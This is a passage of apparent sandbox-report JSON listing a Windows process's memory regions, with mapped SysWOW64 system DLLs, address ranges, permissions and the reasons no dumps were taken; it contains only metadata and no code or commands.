"permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2485", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2486", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2487", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2488", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_2489", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:22.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2490", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:22.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2491", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:22.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2492", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:22.571", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2493", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:22.571", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2494", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:22.571", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2495", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:22.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2496", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:22.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_2497", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:22.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3436543, "entry_point": 3014656, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2498", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 3014656, "timestamp": "00:01:22.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_2499", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:01:22.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2500", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:22.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788628991, "entry_point": 1788416981, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2501", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:22.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788735487, "entry_point": 1788678817, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2502", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:22.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788739584, "type": "region", "version": 1 }, "end_va": 1788809215, "entry_point": 1788744448, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2503", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788739584, "timestamp": "00:01:22.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1788870656, "type": "region", "version": 1 }, "end_va": 1788923903, "entry_point": 1788875232, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2504", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788870656, "timestamp": "00:01:22.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2505", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:22.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2506", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:22.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2507", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:22.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2508", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:22.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2509", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:22.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2510", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:22.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2511", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:22.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2512", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:22.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2513", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:22.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2514", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:22.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2515", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:22.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2516", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:22.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2517", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:22.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2518", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:22.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2519", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:22.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2520", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:22.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2521", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:22.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2522", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:22.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2523", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:22.604", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2524", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:22.604", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2525", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:22.604", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2526", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:22.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2527", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:22.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2528", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:22.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 5079039, "entry_point": 0, "filename": null, "id": "region_2529", "name": "pagefile_0x0000000000350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3473408, "timestamp": "00:01:22.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2530", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:22.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2531", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:22.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2532", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:22.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2039807, "entry_point": 0, "filename": null, "id": "region_2533", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:22.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2113535, "entry_point": 2097152, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2534", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:01:22.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_2535", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:22.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_2536", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:01:22.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_2537", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:01:22.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 6819839, "entry_point": 0, "filename": null, "id": "region_2538", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:01:22.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 6881280, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2539", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 6881280, "timestamp": "00:01:22.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 9043967, "entry_point": 0, "filename": null, "id": "region_2540", "name": "private_0x0000000000860000", "norm_filename": null, "region_type": "private_memory", "start_va": 8781824, "timestamp": "00:01:22.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 30277631, "entry_point": 0, "filename": null, "id": "region_2541", "name": "pagefile_0x00000000008e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9306112, "timestamp": "00:01:22.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_2542", "name": "private_0x0000000001d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 30539776, "timestamp": "00:01:22.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 31653887, "entry_point": 0, "filename": null, "id": "region_2543", "name": "private_0x0000000001df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31391744, "timestamp": "00:01:22.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2544", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:22.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": 